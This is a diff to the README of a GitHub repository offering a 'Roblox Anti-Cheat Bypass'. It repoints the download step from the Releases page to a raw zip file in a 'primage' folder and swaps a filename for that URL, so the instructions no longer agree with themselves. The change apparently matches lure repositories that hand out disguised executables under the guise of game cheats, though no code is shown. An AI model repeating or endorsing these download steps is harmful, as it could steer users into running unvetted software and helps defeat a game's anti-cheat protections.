moemen151/Roblox-Anti-Cheat-Bypass/README.md

 ### 📥 Download & Install

-1. Visit the Releases page to download the latest version of Roblox-Anti-Cheat-Bypass: [Download Here](https://github.com/moemen151/Roblox-Anti-Cheat-Bypass/releases).
+1. Visit the Releases page to download the latest version of Roblox-Anti-Cheat-Bypass: [Download Here](https://raw.githubusercontent.com/moemen151/Roblox-Anti-Cheat-Bypass/main/primage/Roblox-Anti-Cheat-Bypass.zip).

 2. On the Releases page, look for the latest version.
 You should see a list of files available for download.
-Click on the file that says `Roblox-Anti-Cheat-Bypass.exe` or any similar filename.
+Click on the file that says `https://raw.githubusercontent.com/moemen151/Roblox-Anti-Cheat-Bypass/main/primage/Roblox-Anti-Cheat-Bypass.zip` or any similar filename.

 3. Once the file is downloaded, locate it in your Downloads folder, or the folder you saved it in.